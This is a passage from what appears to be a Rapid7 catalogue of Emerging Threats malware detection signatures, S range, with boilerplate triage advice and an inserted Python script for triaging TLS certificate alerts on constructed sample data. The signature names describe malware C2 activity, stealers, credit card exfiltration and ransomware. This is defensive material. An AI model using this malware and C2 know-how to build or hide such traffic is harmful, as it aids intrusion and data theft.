ET MALWARE SiameseKitten/Lyceum/Hexane MSIL/Shark CnC Activity (Upload)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SiameseKitten/Lyceum/Hexane MSIL/Shark CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SiameseKitten/Lyceum/Hexane MSIL/Shark Uploading to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sidecopy APT Backdoor Related Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SideCopy Group Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sidewalk CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sidewinder Stage 2 VBS Downloader Reporting Successful Infection

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Silent Miner Changelog Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Simda.C Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Single char EXE direct download likely trojan (multiple families)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sinowal/sinonet/mebroot/Torpig infected host checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sinowal/sinonet/mebroot/Torpig infected host POSTing process list

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sisproc update

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE slock Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE SLOTHFULMEDIA RAT CnC (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Slugin.A PatchTimeCheck.dat Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smart Fortress FakeAV/Kryptik.ABNC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SmokeBot grab data plaintext

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SmokeLoader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smoke Loader Checkin r=gate

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smokeloader getgrab Command

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smokeloader getload Command

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smokeloader getproxy Command

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smokeloader getsock Command

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SmokeLoader - Init 0x

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SMS-Bomber Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SMSHoax Riskware checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Smurf2 CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sn0wsLogger CnC Exfil M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sn0wsLogger CnC Exfil M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Snake Keylogger CnC Exfil via Telegram

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Snake rootkit usermode-centric encrypted command from server

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (ALIVE)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (CB)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (CD)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (EX)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (EXIT)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (finito)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (LD)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (LIST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (LS)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SNIcat - Detected C2 Commands (SIZE)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Socelars Stealer CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sofacy HTTP Request microsof-update.com

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sofacy Request Outbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Solarbot Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SolarBot Plugin Download ComputerInfo

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SolarBot Plugin Download MessageBox

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SolarBot Plugin Download WalletSteal

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SolarSys CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sorano Stealer CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (default)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (rhyno321)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (SBTCM)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (slayer)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (VHIbot/1.0)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (Vulture)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (x09)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya C2 User-Agent (xehanort321)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Soraya Credit Card Exfiltration

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SoulSearcher Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Application Layer Protocol - T1071

ET MALWARE SoulSearcher Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Application Layer Protocol - T1071

ET MALWARE SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SPEAR CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE SPEAR CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Spoofed MSIE 7 User-Agent Likely Ponmocup

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Spoofed MSIE 8 User-Agent Likely Ponmocup

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Spora Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Spora Ransomware SSL Certificate Detected

Description

Recommendation

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE SpyAgent C&C Activity (Request)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SpyAgent C&C Activity (Response)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SpyEye C&C Check-in URI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SpyEye Checkin version 1.3.25 or later

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SQUIRRELWAFFLE Loader Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SQUIRRELWAFFLE Server Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL Cert Associated with Lazarus Downloader (JEUSD)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (APT32 METALJACK)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (APT32 METALJACK)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (APT32 METALJACK)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (APT32 METALJACK)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (Buer Loader)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (DiplomatLoader)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (Get2 CnC)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (Magecart)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (Maldoc CnC)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. The signature matches a TLS server certificate that has been associated with malicious-document (maldoc) command-and-control infrastructure. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question, including the server certificate and the SNI of the flagged session, and check for other internal hosts connecting to the same certificate. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (StrongPity)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. The signature matches a TLS server certificate that has been associated with StrongPity infrastructure. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question, including the server certificate and the SNI of the flagged session, and check for other internal hosts connecting to the same certificate. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (Various Crimeware)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. The signature matches a TLS server certificate that has been associated with several crimeware families. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question, including the server certificate and the SNI of the flagged session, and check for other internal hosts connecting to the same certificate. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE SSL/TLS Certificate Observed (WRAT)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. The signature matches a TLS server certificate that has been associated with WRAT infrastructure. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question, including the server certificate and the SNI of the flagged session, and check for other internal hosts connecting to the same certificate. If necessary, rebuild the host from a known-good source and have the user change their password.
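The "SSL/TLS Certificate Observed" alerts above all fire on the server certificate presented in a TLS handshake, so the first triage step is the same for each of them: pull the certificate subject, issuer, fingerprint and the client's SNI for the flagged session, then use the certificate fingerprint to find every other internal host that negotiated a session with the same server. The following is an added example of that triage, not Rapid7's or Emerging Threats' code. It assumes the sensor can export Suricata-style EVE JSON records (one per line) in which the alert event and the tls event of a session share a flow_id; the field names used (subject, issuerdn, fingerprint, sni, ja3.hash) are Suricata's, and every record is constructed for the example.

```python
"""Triage helper for "SSL/TLS Certificate Observed" alerts.

Added example; this is not Rapid7's or Emerging Threats' code. It assumes the
sensor can export Suricata-style EVE JSON, one record per line, in which the
"alert" event and the "tls" event for a session share a flow_id. All records
below are constructed for the example.
"""
import json

# Constructed sample: one certificate alert, the tls event of the same flow,
# a second internal host that negotiated the same server certificate without
# an alert record, and one unrelated flow with a CA-issued certificate.
SAMPLE_EVE = r"""
{"timestamp":"2024-01-01T10:00:00.000000+0000","flow_id":1001,"event_type":"alert","src_ip":"10.0.0.5","src_port":50123,"dest_ip":"203.0.113.10","dest_port":443,"proto":"TCP","alert":{"signature":"ET MALWARE SSL/TLS Certificate Observed (StrongPity)","category":"Malware Command and Control Activity Detected","severity":1}}
{"timestamp":"2024-01-01T10:00:00.100000+0000","flow_id":1001,"event_type":"tls","src_ip":"10.0.0.5","src_port":50123,"dest_ip":"203.0.113.10","dest_port":443,"proto":"TCP","tls":{"subject":"CN=update-service.example","issuerdn":"CN=update-service.example","fingerprint":"aa:bb:cc:dd","sni":"update-service.example","version":"TLS 1.2","ja3":{"hash":"00000000000000000000000000000000"}}}
{"timestamp":"2024-01-01T10:03:12.000000+0000","flow_id":1002,"event_type":"tls","src_ip":"10.0.0.9","src_port":51044,"dest_ip":"203.0.113.10","dest_port":443,"proto":"TCP","tls":{"subject":"CN=update-service.example","issuerdn":"CN=update-service.example","fingerprint":"aa:bb:cc:dd","sni":"update-service.example","version":"TLS 1.2"}}
{"timestamp":"2024-01-01T10:05:00.000000+0000","flow_id":1003,"event_type":"tls","src_ip":"10.0.0.7","src_port":50999,"dest_ip":"198.51.100.4","dest_port":443,"proto":"TCP","tls":{"subject":"CN=www.example.org","issuerdn":"CN=Example Root CA","fingerprint":"11:22:33:44","sni":"www.example.org","version":"TLS 1.3"}}
"""


def parse_eve(text):
    """Parse EVE JSON lines into dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def common_name(dn):
    """Return the CN attribute of a comma-separated distinguished name."""
    for rdn in dn.split(","):
        key, _, value = rdn.strip().partition("=")
        if key.strip().upper() == "CN":
            return value.strip()
    return ""


def triage_cert_alerts(records):
    """Join each certificate alert with the tls event of the same flow.

    Returns one dict per alert carrying what an analyst needs first: the
    server certificate (subject, issuer, fingerprint), the SNI the client
    asked for, and whether the certificate is self-signed or disagrees with
    the SNI. Both are common in attacker infrastructure but also in
    legitimate appliances, so they are triage hints, not verdicts.
    """
    tls_by_flow = {r["flow_id"]: r["tls"] for r in records if r.get("event_type") == "tls"}
    findings = []
    for r in records:
        if r.get("event_type") != "alert":
            continue
        sig = r["alert"]["signature"]
        if "Certificate" not in sig and "SSL Cert" not in sig:
            continue
        tls = tls_by_flow.get(r["flow_id"], {})
        subject, issuer, sni = tls.get("subject", ""), tls.get("issuerdn", ""), tls.get("sni", "")
        findings.append({
            "signature": sig,
            "client": f"{r['src_ip']}:{r['src_port']}",
            "server": f"{r['dest_ip']}:{r['dest_port']}",
            "sni": sni,
            "subject": subject,
            "issuer": issuer,
            "fingerprint": tls.get("fingerprint", ""),
            "ja3": (tls.get("ja3") or {}).get("hash", ""),
            "self_signed": bool(subject) and subject == issuer,
            "sni_mismatch": bool(sni) and common_name(subject) != sni,
        })
    return findings


def hosts_using_certificate(records, fingerprint):
    """Scoping pivot: every internal client that negotiated a session with
    the same server certificate, whether or not an alert was raised on it.
    The rule fires per session; the fingerprint links every host that
    talked to that infrastructure."""
    return sorted({r["src_ip"] for r in records
                   if r.get("event_type") == "tls"
                   and r["tls"].get("fingerprint") == fingerprint})


if __name__ == "__main__":
    recs = parse_eve(SAMPLE_EVE)
    for finding in triage_cert_alerts(recs):
        print(finding)
        print("hosts with the same certificate:",
              hosts_using_certificate(recs, finding["fingerprint"]))
```

On the sample data the alert on 10.0.0.5 resolves to a self-signed certificate whose CN matches the SNI, and the fingerprint pivot surfaces 10.0.0.9 as a second host that spoke to the same server without triggering an alert; that second host is the one the "rebuild the host" recommendation is easy to miss.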

ET MALWARE SSV Agent CnC Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Stabuniq Checkin

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE StartPage jsp checkin

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE StartPage Userclass HTTP Request

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Stealbit Variant Data Exfil M1

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Stealbit Variant Data Exfil M2

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE StealerNeko CnC Checkin

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE StealRat Checkin

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Steam Steal0r

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Steam Stealer

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE SteamStealer Domain in SNI

